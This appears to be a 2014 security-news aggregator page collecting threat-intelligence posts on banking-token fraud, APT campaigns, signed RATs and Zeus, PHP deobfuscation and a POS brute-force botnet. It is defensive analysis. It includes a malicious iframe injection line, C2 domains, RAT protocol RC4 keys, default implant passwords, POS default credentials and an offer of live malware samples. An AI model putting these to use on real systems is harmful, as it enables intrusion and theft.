Home   Blog   Twitter   Database  

Hacker claims breach of Wall Street Journal and Vice websites, punts 'user data' for sale

Also supposedly hit a gadgets site called 'CNET'

A hacker known for attacking news websites has claimed successful hacks against both the Wall Street Journal and Vice.…

Posted: 22 Jul 2014 | 7:14 am

Finding Holes in Banking Security: Operation Emmental


Like Swiss Emmental cheese, the ways your online banking accounts are protected might be full of holes. Banks have been trying to prevent crooks from accessing your online accounts for ages. Passwords, PINs, coordinate cards, TANs, session tokens – all of these were created to help prevent banking fraud. We recently come across a criminal operation that aims to defeat one of these tools: session tokens. Here’s how they pull it off.

This criminal gang intents to target banks that use session tokens sent through SMS (i.e., text messaging). This is a two-factor authentication method that utilizes users’ phones as a secondary channel. Trying to log into the banking site should prompt the bank to send users an SMS with a number. Users need to enter that number along with their regular username and password in order to transact with the bank. By default, this is used by some banks in Austria, Sweden, Switzerland, and other European countries.

Cybercriminals spam users from those countries with emails spoofing well-known online retailers. The users click a malicious link or attachment and get their computers infected with malware. So far, all this is fairly typical and from a threat perspective, a bit boring.

But here’s where it gets interesting. The users’ computers don’t really get infected—not with the usual banking malware, anyway. The malware only changes the configuration of their computers then removes itself. How’s that for an undetectable infection? The changes are small…. but have big repercussions.

Here’s how it works: the users’ computers’ DNS settings are changed to point to a foreign server controlled by the cybercriminals. The malware installs a rogue SSL root certificate in their systems so that the malicious HTTPS servers are trusted by default and they see no security warning.

Normal two factor

Figure 1. What happens in the 2-factor authentication process when the PC is infected in Operation Emmental

Now, when users with infected computers try to access the bank’s website, they are instead pointed to a malicious site that looks like that of their bank. So far, this is just a fancy phishing attack but these criminals are much more devious than that. Once the users enter their credentials, they are instructed to install an app on their smartphone.

This malicious Android app is disguised as a session token generator of the bank. In reality, it will intercept SMS messages from the bank and forward them to a command-and-control (C&C) server or to another mobile phone number.  This means that the cybercriminal not only gets the victims’ online banking credentials through the phishing website, but also the session tokens needed to bank online as well. The criminals end up with full control of the victims’ bank accounts.

How’s that for a big malware operation? Localized spam runs, nonpersistent malware, rogue DNS servers, phishing pages, Android malware, C&C servers, and the real back-end servers. You can’t say these criminals are lazy.

The criminals behind this particular operation target Internet users in Switzerland, Austria, and Sweden. Just this May, they added Japanese Internet users to their list of potential victims. We were able to trace the operators back to online nicknames: -=FreeMan=- and Northwinds. These actors has been active since 2011. Back then, they spread off-the-shelf malware like SpyEye and Hermes. Looking at the binaries that were recently deployed, we think the actors made use of at least two different crypting services. One of these crypting services is run by an individual from Uzbekistan.  We have not been able to identify the other crypting service.

More information about this attack may be found in our Finding Holes: Operation Emmental white paper, where we discuss this technique in depth. SWITCH.CH, the CERT for Universities in Switzerland, also did research on Emmental and published their findings on their site.

Post from: Trendlabs Security Intelligence Blog - by Trend Micro

Finding Holes in Banking Security: Operation Emmental

Posted: 22 Jul 2014 | 5:10 am

Dirty Dozen Spampionship – which country is spewing the most spam?

The World Cup may be done and dusted, but the Spampionship continues! Where did you come in our spam-sending league tables?

Posted: 22 Jul 2014 | 4:53 am

Haunted by APT

Over the past decade, APT have intensely targeted organizations and individuals across India. Its developing base of technology, its geographical location and bounds, its inclusive and riotous political energy, and its growing economic weight makes it a special place of interest for badly intentioned cyber attackers. The list of APT groups targeting Indian organizations is unfortunately quite long. A few interesting mentions include Gh0stNet, Shadownet, an Enfal actor, Red October, NetTraveler, the LuckyCat actor, the Turla APT, a Mirage actor, and the Naikon crew. There are many more. And, in unique cases, we have seen unusual new techniques, some for infiltrating mobile devices by the Chuli attackers, the Sabpub attackers' focus on Apple's OS X devices, various effective watering holes, and the generally noisy, targeted activity we would expect from most of these actors.


More recently in March, we saw a pickup in offensive activity on Indian organizations invested in environmental, economic and government policy. This crew has been targeting organizations for a few years now with an unusual offensive WMI technique that continues to be effective. The components have been called WMIGhost or Shadow. These attackers, like others currently active, are generally re-using current headline geopolitical event spearphishing themes to establish a foothold in target organizations. For example, in a March 2014 attack, this actor used an upcoming meeting between national energy labs and the Departments of Energy as their spearphishing lure, filename mis-spellings and all, "India US strategic dialouge press release.doc" (000150415302D7898F56D89C610DE4A9).


From there, the dropper and component chain is the same they have used in the past. Successful exploitation drops  "dw20.exe" (803e8f531989abd5c11b424d8890b407)  -->  "gupdate.exe" (481f8320b016d7f57997c8d9f200fe18) and "~tmpinst.js" (6a279a35141e9a7c73a8b25f23470d80). The script instantiates WMI objects for communications complete with their Comment Crew-like encoded wordpress site instructions that redirect the backdoor to the appropriate command and control server for further instruction.

Along with other groups, WMIGhost attackers are actively hitting Indian targets. In another recent WMIGhost campaign this year, a spoofed unclassified military document was sent simultaneously to several Indian targets with the consistent WMIGhost toolchain, "united states air force unmanned aircraft systems flight plan 2009-2047.doc".


We observe more of these current attacks occurring throughout the country on government and military agencies, NGOs, subcontractors and technology developers, with an expanding scope of targets.

Of these groups to date, NetTraveler was the most prolific, and in many ways the most successful at exfiltrating large volumes of information. The NetTraveler crew spent a disproportionate amount of effort and attention on extracting data from Indian organizations overall. NetTraveler is stealing GB of data from victims all over the globe, including the many victims in India. An example of their past spearphish decoys deployed to India is displayed here. The content encompasses Indian political issues, current at the time of delivery:


Meanwhile, other actors are currently working to exfiltrate more data out of India. Multiple levels of Indian organizations are frightfully pounded with spearphish and webserver attacks with no end in sight.

Posted: 21 Jul 2014 | 9:15 pm

CZ Solution Ltd. signed samples of Xtreme Rat, Zeus, Spy-Net, Gh0st, BozokRAT and other

Here are all samples (+ more) mentioned in this post by Fireeye : The Little Signature That Could: The Curious Case of CZ Solution"
All files are digitally signed with a "CZ Solutions" certificate making it easy to create a Yara or ClamAV signature.

A few Zeus samples seem to be still beaconing. Most are sinkholed.
The certificate is now revoked by VeriSign.



Download. Email me if you need the password

File Information

Listed by Fireeye 
  1. Xtreme Rat_78CED3B6C04D372CE10B6B8606B3B747 78ced3b6c04d372ce10b6b8606b3b747
  2. Spy-Net 2.6_6A56F6735F4B16A60F39B18842FD97D0 6_6A56F6735F4B16A60F39B18842FD97D0
  3. Xtreme Rat_7C00BA0FCBFEE6186994A8988A864385.msg msg 7c00ba0fcbfee6186994a8988a864385
  4. XtremeRAT 3.5 Private _2E776E18DEC61CF6CCD68FBACD55FAB3 2e776e18dec61cf6ccd68fbacd55fab3
  5. XtremeRAT 3.5 Private _BD70A7CAE3EBF85CF1EDD9EE776D8364 bd70a7cae3ebf85cf1edd9ee776d8364
  6. XtremeRAT 3.5 Private_0BE3B0E296BE33903BF76B8CD9CF52CA 0be3b0e296be33903bf76b8cd9cf52ca
  7. XtremeRAT 3.5 Private_7416EC2889227F046F48C15C45C102DA 7416ec2889227f046f48c15c45c102da
  8. XtremeRAT 3.5 Private_BE47EC66D861C35784DA527BF0F2E03A be47ec66d861c35784da527bf0f2e03a
  9. XtremeRAT 3.5 Private_C27232691DACF4CFF24A4D04B3B2896B c27232691dacf4cff24a4d04b3b2896b
  10. XtremeRAT 3.5 Private_E79636E4C7418544D188A29481C100BB e79636e4c7418544d188a29481c100bb
  11. Zeus_9C11EF09131A3373EEF5C9D83802D56B 9c11ef09131a3373eef5c9d83802d56b
  12. Zeus_DCD3E45D40C8817061F716557E7A05B6 dcd3e45d40c8817061f716557e7a05b6

Additional (mix of RATs and Trojans)

  1. 2D186068153091927B26CD3A6831BE68 2d186068153091927b26cd3a6831be68
  2. 4A997E3395A8BB8D73193E158289F4CE 4a997e3395a8bb8d73193e158289f4ce
  3. 7E92A754AAAA0853469566D5DBF2E70C 7e92a754aaaa0853469566d5dbf2e70c
  4. 9CFD17C48FC0D300E4AA22E2C8C029D6 9cfd17c48fc0d300e4aa22e2c8c029d6
  5. 37FEE821695B664EBE66D55D8C0696F2 37fee821695b664ebe66d55d8c0696f2
  6. 445C22E94EAB61B3D4682824A19F8E92 445c22e94eab61b3d4682824a19f8e92
  7. 819B4C40F56F69C72E62EF06C85EA3E1 819b4c40f56f69c72e62ef06c85ea3e1
  8. 947C21CB8E28B854FF02C2241399A450 947c21cb8e28b854ff02c2241399a450
  9. 2859089CC3E31DA60C64D56C416175E2 2859089cc3e31da60c64d56c416175e2
  10. A9EE1BF62DEE532BE2BE217D3E4A8927 a9ee1bf62dee532be2be217d3e4a8927
  11. AC87BC7DD4B38FA3EBA23BF042B160CE ac87bc7dd4b38fa3eba23bf042b160ce
  12. B953FD2B3D5C10EC735681982D3C6352 b953fd2b3d5c10ec735681982d3c6352
  13. BD5188031BB8EB317FB58F0A49CCBF9C bd5188031bb8eb317fb58f0a49ccbf9c
  14. D7CF30E3DBFD32A1D1E38CEE464EC6A6 d7cf30e3dbfd32a1d1e38cee464ec6a6
  15. E1AFC706C8C96FACEDB6CB62E6CBFD2D e1afc706c8c96facedb6cb62e6cbfd2d
  16. Gh0stB_7A26BBD7B5942B49FC0A9CB7268BD030 7a26bbd7b5942b49fc0a9cb7268bd030
  17. SpyRat_E0B0BBA2F6399B0577C37E2A3BC3390A e0b0bba2f6399b0577c37e2a3bc3390a
  18. Zeus_0D8F9C5898596251233C3FD1DCB34161 0d8f9c5898596251233c3fd1dcb34161
  19. Zeus_7A6BBC32868A9F776452355F909F95D6 7a6bbc32868a9f776452355f909f95d6
  20. Zeus_7CD6C4A6103F23858C7ED047391F1D3B 7cd6c4a6103f23858c7ed047391f1d3b
  21. Zeus_52BE0408084F536E42FEB7C57F521592 52be0408084f536e42feb7c57f521592
  22. Zeus_5746DD569623431BA41A247FA64847D7 5746dd569623431ba41a247fa64847d7
  23. Zeus_A79089B5E6744C622D61BEFA40AF77D3 a79089b5e6744c622d61befa40af77d3
  24. Zeus_E2190F61B532BD51E585449BAAE31BC1 e2190f61b532bd51e585449baae31bc1
  25. Zeus_F76A509FEE28C5F65046D6DC072658B2 f76a509fee28c5f65046d6dc072658b2

Posted: 20 Jul 2014 | 9:59 pm

The Little Signature That Could: The Curious Case of CZ Solution

Malware authors are always looking for new ways to masquerade their actions. Attackers are looking for their malware to be not only fully undetectable, but also appear valid on a system, so as not to draw attention. Digital signatures are one way malware authors keep under the radar. Digital signatures are an easy, quick way to verify the authenticity of an application utilizing the signature.

Threat actors routinely steal digital signing certificates to hide in plain sight. There are recent reports of banking Trojans such as Zeus, using valid signatures to get past both automated and human defenses. Part of performing accurate threat intelligence is continually looking to the past to help better predict the future. This is proven in the samples we will be discussing in this blog. Many of the samples throughout this blog are from the summer of 2013. These particular samples however, piqued our interest because of the mass distribution of RATs in a particular targeted region. It also reminded us of a recent XtremeRAT blog we published earlier in 2014.

The Little Signature That Could

While investigating an uptick in Spy-Net spam campaigns, we came across a malware binary that was digitally signed that struck our interest. Spy-Net allows an attacker to interact with the victim via a remote shell to upload/download files, interact with the registry, running processes and services as well as capture images of the desktop and record form the webcam and audio. It also contains functionality to extract saved passwords and turn the victim into a proxy server. During the build process, an attacker can choose to enable a keylogger and evasion functionality designed to stop the information process if a debugger or virtual machine is found.

We noticed that one of the Spy-Net binary files, sc2.exe (MD5: 6a56f6735f4b16a60f39b18842fd97d0), upon closer inspection, was utilizing a valid digital signature, from a company called CZ Solution Co. Ltd.


Figure 1: Signature Details of sc2.exe

Looking closer at the signature, we noticed that all of the details were intact, and appeared to be valid. There are two additional code-signing certificates issued to CZ Solution Co. Ltd.


Figure 2: Additional Signature Details

Investigation of sc2.exe showed typical Spy-Net behaviors. The sample beaconed out to ekinox.no-ip.info. From here, we decided to pivot off the CZ Solution signature and see what we could find.

Connections Emerge

As we started to pivot off the CZ Solution signature, we started to see some interesting commonalities. Pivoting proved that the CZ Solution signature was not just used in Spy-Net binaries. We quickly found that this signature was being used with XtremeRAT, a popular RAT that cybercriminals and targeted attackers use regularly. The code of XtremeRAT is shared amongst several other Delphi RAT projects including Spy-Net, CyberGate, and Cerberus.

XtremeRAT allows an attacker to:

One binary for instance, m.exe (MD5: c27232691dacf4cff24a4d04b3b2896b) which was XtremeRAT, was seen beaconing out to http://omegaphotography.[co].uk, batardchris.servehttp.com /1234567890.functions, and www.batteurmag.com/[plugin].xtr.

Likewise, we saw multiple samples of the Zeus Trojan utilizing the CZ Solution signature. Zeus modifiers can tune Zeus to steal information they are interested in; typically login credentials for online social networkse-mail accountsonline banking or other online financial services. Zeus is commonly seen targeting customers of financial institutions.

One of the Zeus samples, uk.exe (MD5: dcd3e45d40c8817061f716557e7a05b6) that was utilizing the CZ Solution signature, was beaconing out to claire-morin.com/file.php.

Looking at the three samples show that CZ Solution was used to create and sign Spy-Net, XtremeRAT, and Zeus samples. Graphing out the connections between the samples we profiled, you can quickly see how fast this web of similarities continue.

cz3Figure 3: Connection Profile of Binaries Using CZ Solution

The French Connection and C2 overlap

Attribution of actors and/or campaigns can often be a difficult and tedious task. However, since we were dealing with so many inter-twining binaries, we could start to draw some parallels between samples.

When looking at the overall connections between the CZ solution signature, you can start to see a trend emerge.  First, there is some C2 overlap. For instance Dllsv.exe (MD5: 3f042fd6b9ce7e23b3c84c6f7323dd75) communicates out to ekinox.no-ip.info, using the same CZ Solution cert. This malware is flagged as BozokRAT; a user-friendly RAT that can upload and download files to and from a computer, modify registry entries, and perform other typical RAT functions. That same C2, ekinox.no-ip.info, is also seen used by the aforementioned Spy-Net binary, sc2.exe (MD5: 6a56f6735f4b16a60f39b18842fd97d0).

In another example of C2 overlap, a file named uk.exe, (MD5: 9c11ef09131a3373eef5c9d83802d56b) uses its C2 as omega-photography.co.uk. This sample is an active Zeus binary. That same C2 is used with a file named x.exe, (MD5: c27232691dacf4cff24a4d04b3b2896b), an active XtremeRAT binary.

Next, we needed to identify at least one infection vector to ensure we could track how one of the binaries using the CZ Solution signature was getting into environments.

In one case, we found the infection vector for an XtremeRAT binary that was using the CZ Solution certificate. The binary came in the form of phished email (MD5: 7c00ba0fcbfee6186994a8988a864385) purportedly from Armani regarding an order.


The email was in French and the headers were interesting, as the same sender has been seen in multiple French spam runs.


The attachment in the email is using the RTLO trick to disguise a 7zip file as a PDF.

While looking at the all the samples we correlated and pivoted off of, we found that a majority of both the language and C2’s being used all revolved around the French language. The domains that were part of the C2 infrastructure were almost all exclusively French, as was the registrant information for the domains in question.

Spy-Net C2 Protocol Analysis

As we have already shared some analysis details of XtremeRAT in a previous blog, we decided to share some information and tools we built regarding Spy-Net this time. This information is based on our analysis of Spy-Net version 2.6 specifically. Other versions of Spy-Net may have significant changes to the protocol. Spy-Net 2.6 utilizes a homegrown protocol like many other publicly available RATs. It’s an ASCII based, pipe-delimited protocol utilizing Portuguese keywords that employs two totally different forms of obfuscation: one for outbound communication to the attacker and another for inbound communication to the implant. The outbound communications are compressed with zlib and encrypted with RC4. The RC4 key is hard-coded and is updated with version changes. For example, the RC4 key for Spy-Net 2.6 is njkvenknvjebcddlaknvfdvjkfdskv, while for CyberGate 1.07, which has a similar (if not the same) protocol the key is njgnjvejvorenwtrnionrionvironvrnvcg107 and CyberGate 1.18’s key is njgnjvejvorenwtrnionrionvironvrnvcg117.

The astute reader may have noticed that the last three numbers of the CyberGate keys (roughly) represent the version number of CyberGate. The inbound communication to the implant employs an ASCII encoding scheme similar to Base64.  This protocol begins with a simple authentication scheme where the implant sends an authentication password that is validated by the client. This password is configurable by the attacker and defaults to abcd1234.  The implant then proceeds to send the entirety of its configuration information, as configured by the attacker, to the client so it can be displayed on its “Configuration” tab.


Implant->Client: mypassword|Y|

Configuration Request and Response

Client->Implant: configuracoesdoserver|

Implant->Client: configuracoesdoserver|configuracoesdoserver||#myID|mypassword|C:\WINDOWS\install\server.exe|C:\Program Files\Internet Explorer\iexplore.exe| | |{0OP8GNN1-GIWW-CC7M-AJ0I-6Y554UOJJ241}|Policies|FALSE|TRUE|TRUE|TRUE|***MUTEX***| | |TRUE|FALSE| | | | | | |FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|server.exe#crack.exe#|FALSE|

The outbound communications from the implant to the client are prepended with an ASCII representation of the length of the payload followed by a pipe character and a new line character.


There is a noticeable lack of sophistication in Spy-Net’s code. For example, in some cases the length indicator is followed by a pipe and a single new line (\n) character as seen in *nix based operating systems. In other cases, the indicator is followed by the carriage return and new line characters (\r\n), as seen in Windows operating systems. This lack of conformity is also witnessed in how there are two totally different schemes used for obfuscation, and in how obfuscation is not used for file transfers as it is otherwise used throughout the protocol.

Spy-Net Protocol Decoder

Since Spy-Net is a publicly available RAT that we see in use quite often, we decided to build a ChopShop module for it and share it in cooperation with our friends at MITRE.  The module is now available as a standard part of the framework available on GitHub.  We are also sharing a Spy-Net configuration dumping pycommand for Immunity Debugger.  While hunting for related samples in VirusTotal, we came across a pcap that had captured the initial infection and subsequent communication of the Spy-Net binary we initially mentioned, (MD5: 6a56f6735f4b16a60f39b18842fd97d0). This gave us a great opportunity to test our new decoder. One thing that Spy-Net implants will commonly send out automatically is a thumbnail image of the user’s desktop. This is displayed on the client.


Our decoder can extract such images from the pcap and what we found gave us a further hint that we may be dealing with attacks focused in France. Although difficult to read due to the very low resolution of the thumbnail, our pcap decoder was able to tell us that the title of the browser window currently open in this screenshot is “Football – MAXIFOOT l’actualit  foot et transfert – Windows Internet Explorer.”


Distribution via Malicious Java Applet

According to the details of the pcap we decoded, this French football Web site (maxifoot.fr) was apparently compromised and had an iframe inserted into it that pointed to another compromised Web site, a Canadian addiction recovery resource: unwasted.ca.

<iframe width=”1px” height=”1px” src=”hxxp://unwasted.ca/skins/index.html” style=”display: block;” ></iframe>

The latter site hosted a malicious Java applet that downloaded the Pony/Fareit malicious downloader. The downloader then proceeded to install ZeuS and download and execute the aforementioned Spy-Net binary. All of these binaries were signed with the stolen digital certificate. The malicious Java applet used to install the Pony downloader was created by Foxxy Software and had been previously written about by ESET.

RAT Configuration Details

We assembled a compilation of the meaningful configuration data found in the XtremeRAT and Spy-Net samples we came across in our analyses. You can observe some similarities between the samples’ configurations.

MD5 Version Dir/Path ID Group Mutex Password
f5e6c0a2c9000311513521947a76cb4b Spy-Net 2.6 C:\WINDOWS\system32\conhost\conhost.exe Updater2014 NA R5438NM5 abcd1234
6a56f6735f4b16a60f39b18842fd97d0 Spy-Net 2.6 C:\WINDOWS\system32\Winini\taskhost.exe Uframer NA A7TF5W abcd1234
7416ec2889227f046f48c15c45c102da XtremeRAT 3.5 Private InstallDir SpaM SPAM eyA8znpc NA
2e776e18dec61cf6ccd68fbacd55fab3 XtremeRAT 3.5 Private svhost Diesel Diesel lNFAH0 NA
be47ec66d861c35784da527bf0f2e03a XtremeRAT 3.5 Private svhost IdSec USA3 lNFAH0 NA
c27232691dacf4cff24a4d04b3b2896b XtremeRAT 3.5 Private InstallDir IdSec idsection eyA8znpc NA
e79636e4c7418544d188a29481c100bb XtremeRAT 3.5 Private svhost IdSec USA3 lNFAH04 NA
bd70a7cae3ebf85cf1edd9ee776d8364 XtremeRAT 3.5 Private svhost IdSec IdSec lNFAH0 NA
0be3b0e296be33903bf76b8cd9cf52ca XtremeRAT 3.5 Private svhost CiTa IdSec x4KybsbM NA


The usage of digital signatures isn’t going to decrease anytime soon- especially by threat actors. It gives them a quick, easy way to bypass traditional security controls since certificates and signatures are typically trusted by default. In this blog, we are shown that this trend still true. We looked towards the past in this blog, to better understand motivations and trends going forward. We can accurately say, based on the information attributed, that the CZ Solution signatures were being utilized by an individual or group of individuals using French assets and infrastructure.

These particular actors didn’t show a significant level of expertise, but did show collective resources with knowledge in at least Zeus, Spy-Net, and XtremeRAT. We can say accurately that it is likely these actor(s) were using the same signature to send out a wide range of binaries, possibly even outside of the realm of the four families discussed here. As we wrote this blog, we couldn’t help but be reminded of the spam run focused in Colombia and Central America that we wrote about back in February of this year. A spam run that is regionally focused, but with no apparent targeting in nature, utilizing a mix of ZeuS and off-the-shelf RATs.

Helping protect your organization from threats using valid digital signatures can include verification of the signature’s serial number. In this case, the serial number: 6e 7b 63 95 ac 5b 5c 8a 2a ec c4 52 8d 9e 65 10, is the identifier to locate in regards to this publisher. Also, if you’re running your own internal certificate authority, ensure you are adequately revoking certificates that may have been compromised. This will help ensure compromised certificates are not utilized in attacks.


Posted: 18 Jul 2014 | 7:00 am

Reversing a PHP Script Dynamically and Statically

A reader sent me two PHP scripts because the PHP Converter program I wrote wasn’t able to handle it. They are both similar so I’ll just work on one of them in this post. Here’s what it looks like:


And this is what happens when you try to use PHP Converter:


Let’s reverse this script dynamically and then statically.

First, I’ll just change the ‘eval’ keyword to ‘echo’.


And take a peek at what’s going on.


Yikes, this is messed up! I thought the PHP file got corrupted somehow but then I looked closely and noticed several PHP keywords. This is actually a pretty clever technique. Basically the script is converting the strange characters to text but it’s surrounded by long, seemingly random strings that are variable names.

So I figure I would just write it out to a file and then change the ‘eval’ I noticed at the end to ‘echo’.


Here’s the resulting file:


I’ll just make that quick change and run it again.


Cool, now we know what this script does!

Now let’s reverse this script statically.

Here’s a new, fixed version of PHP Converter. I added a filter to present the results of the deobfuscation without stopping if it encounters any strange characters. The characters outside the alphanumeric range will be represented by a neutral character.


I also added the ability to output the result to Base64 format and/or to a file. With both options checked, you will get a text file of the result encoded in Base64 so the binary values will be preserved.


Now I can convert this base64-encoded string to text using Converter.


After cleaning this up, we can see that the section below is XOR’ing the blob using the decimal value of ’30′ which is assigned to the first variable.


I’m going to convert the base64-encoded string to hex this time.


Then send the data to Converter’s Key Search/Convert feature and set the values accordingly:


And I get this result. The junk at the top and bottom is the result of XOR’ing the original text so I can ignore that.


There are other ways to get to the final result but I think these two methods are straightforward and quick/easy to do.

The updated version of PHP Converter can be downloaded here.

Posted: 11 Jul 2014 | 10:45 pm

Trojan:W32/Lecpetex: Bitcoin miner spreading via FB messages

In early March this year, while investigating various threats as part of our Facebook malware cleanup effort, we ran across an interesting one that was spreading in zipped files attached to messages.

The messages themselves were classic social engineering bait that lead the users to install the executable file in the attachment, which turned out to be a Bitcoin miner, which we identify as Trojan:W32/Lecpetex.

Some of the more interesting details of our analysis are presented in our Lecpetex whitepaper.

lecpetex_cover (66k image)

Facebook's own investigation into Lecpetex lead to an operation to take down the botnet. More details about their takedown effort, and the results from their parallel analysis of the malware, are available here.

Post by — Mangesh

Updated to add details and link to Facebook's takedown post.

On 09/07/14 At 03:22 AM

Posted: 8 Jul 2014 | 6:15 pm

Botnet bruteforcing Point Of Sale terminals via Remote Desktop

Every single day our automated systems analyze hundreds of thousands of malicious samples. Yesterday one of the samples caught my attention because the malware started performing bruteforce attacks against Remote Desktop using certain username and passwords.

MD5: c1fab4a0b7f4404baf8eab4d58b1f821

Other similar samples:

Once started the malware copy itself to \Documents and Settings\Administrator\Application Data\lsacs.exe and starts the communication with the C&C sending data about the status of the bot (number of hosts bruteforced, packets per second, number threatds, version, etc).

and the server replies with a configuration block containing:

- Login/Password list to use during bruteforcing

- Timestamp

- List of IP Addresses to attack

- Number of threads to use

- Interval 

As you can see some of the user/passwords that they are using (pos, pos1, pos01, shop, station, hotel, atm, atm1, micros, microssvc) are the default ones commonly used in Point of Sale terminals by retailers and businesses all around the world.

The control panel of the botnet is also hosted in the same server:

This is not new, we know cybercriminals have been using this technique to compromise Point of Sale systems for years. Once they gain access to the terminal using one of the default credentials, they upload a second stage payload commonly known as a memory scrapper that is a piece of malware that searchs for credit card data in memory before it has been encrypted. Some examples are:

- BlackPOS


- VSkimmer

- Alina

- RetalixScrapper

- Dexter

These pieces of malware are able to extract the credit card data from the terminal and exfiltrate the data to the attackers that will then sell the information in the black market.

When it comes to detect the infection of a system in your network, this is how our AlienVault Unified Security Management (USM) will detect a compromised assset in your network:


USM is able to detect both the communication wit the the C&C server and the network activity that is generated when the malware performs bruteforce attacks against devices on the Internet. It is worth mentioning that the C&C server IP address was already in our Open Threat Exchange database and the correlation engine used that information to generate an alarm about a system compromise.



If you want to try yourself you can download our Open Source SIEM - OSSIM or the Free 30 day trial of AlienVault Unified Security Management (USM)

We have shown how these threats can impact companies using Point Of Sale terminals, specially those retailers and medium and small businesses that don't have visibility into the systems that are part of their networks and handle credit card information.

Some recommendations to protect against these kind of attacks are:

- Change default credentials of POS systems

- Configure an access control list

- Keep your software up-to-date

- Install an Antivirus solution

- Centralize and monitor the logs from your POS systems to detect potential security breaches


Posted: 11 Mar 2014 | 2:34 am

Cyber Engineering Services Announces the Cyber Red List

Cyber Engineering Services Announces the Cyber Red List, Industries That Have Been Cyber Walloped Since 2010

List Highlights Smaller Defense Supply Chain Partners, Legal Counsel and Public Relations/Advertising as Major Targets for Cyber Attacks

COLUMBIA, MD – May 7, 2013 – Based on its observation of thousands of cyber attacks over the 30 months since its founding, Cyber Engineering Services today announced the launch of the Cyber Red List. Developed using the company’s proprietary technology that enables Cyber Engineering Services to identify cyber attacks in progress, the Cyber Red List details the industries that have been hardest hit by cyber attacks since November 2010, and identifies accompanying environmental indicators that place organizations at a higher level of risk.

“Size doesn’t matter when you’re looking at cyber attack victim commonalities; the kind of data you have does,” commented Joseph Drissel, CEO of Cyber Engineering Services and former acting chief of the Department of Defense Computer Forensics Lab cyber intrusions section. “Based on what we’ve read in the news lately, it would be easy for companies with revenues of $1 billion and under to get the false impression that only the big contractors, the news organizations, and companies that are involved in Chinese diplomacy are targets. The Cyber Red List shows that what motivates the adversary is the kind of information you deal in and have access to – weapons, communications, energy, policy, and research – and often the smaller companies don’t have the resources in place to effectively seal their networks. We help them get the same level of data protection as the big guys.”

Cyber Engineering Services is an information security company with heavy experience in forensics analysis, reverse engineering and malware arenas focusing on what is known as the Advanced Persistent Threat (APT). Its proprietary technology, called Legal Non-Invasive Malware Exploitation technique (LNIME), provides the company substantial insight into the malicious activities of cyber adversaries. Cyber Engineering Services works on behalf of its clients to:
• Identify, in real time, when a cyber attack is happening,
• Stop an attack before critical data is lost,
• See live command-and-control keystrokes of the adversary, and
• Engage with the adversary to regain control of networks.
“A huge volume of our country’s intellectual property is owned by companies that supply or collaborate with large contractors or government agencies, yet what is most alarming is that many of these companies don’t have the cyber security infrastructure that their larger, better-funded counterparts do,” Drissel went on to say. “The smaller players not only have the most to lose in terms of IP and valuation, but the potential implications for national and international safety, security, health and well-being are vast. All it takes is one hole in the network to result in a massive data loss. We identify and then plug those holes to keep the bad guys out and seal data in.”
For media inquiries, contact: Media@CyberEngineeringServices.com.

The Cyber Red List

Cyber Engineering Services has observed cyber attacks in thousands of networks since the company’s inception in November 2010, many of which resulted in significant data losses for the compromised companies. The following is a snapshot of industries that were most targeted based on the data gathered through Cyber Engineering Services Legal Non-Invasive Malware Exploitation (LNIME) technique. The vast majority of compromises took place in organizations with revenues of less than $1 billion USD annually.

1. Defense, Homeland Security, International Security including unmanned aerial vehicles (UAV), satellite communications, aerospace and military communications, rocket and propulsion systems, and radar systems.

2. Critical infrastructure including energy, oil, gas, transportation, banking, and telecommunications.

3. Sensitive data exchange environments including law firms, public relations and advertising agencies whose clients do business in energy, oil, transportation, communications, and defense.

4. Long-term policy information including from lawmakers, think tanks, diplomatic and policy organizations.

5. Research and Development-focused industries including laboratories, pharmaceutical and medical facilities.

Additionally, the following environmental indicators were present in cyber attacks among the targeted industries:

1. Where data is shared electronically via email, the internet, on a smartphone or other handheld device;
2. Where the Advanced Persistent Threat or competitor could degrade or otherwise manipulate data to source, duplicate, transport, purchase, sell, manufacture or supply a product or service through alternate means;
3. Where there is a global nexus.

Due to the highly sensitive nature of the data that was breached in these attacks – inclusive of data protected under the International Traffic in Arms Regulations (ITAR) – Cyber Engineering Services does not disclose the names of the victims or the technical information that was stolen. Cyber Engineering Services has reported these incidents directly to the victims, as well as followed established protocols to report to the government agencies that oversee these functions.

Cyber Engineering Services, an information security company with heavy experience in forensics analysis, reverse engineering and malware arenas focusing on what is known as the Advanced Persistent Threat (APT), compiled the Cyber Red List to raise awareness among victim organizations – especially smaller organizations often with fewer cyber security resources – for the need to protect mission and operation-critical data assets from cyber attacks. Cyber Engineering Services team of experts works with clients to control their networks and protect their most valued data assets using unrivaled technical skills, investigative curiosity and tenacity to prevail. For more information, contact Media@CyberEngineeringServices.com.

# # #

Posted: 6 May 2013 | 8:21 pm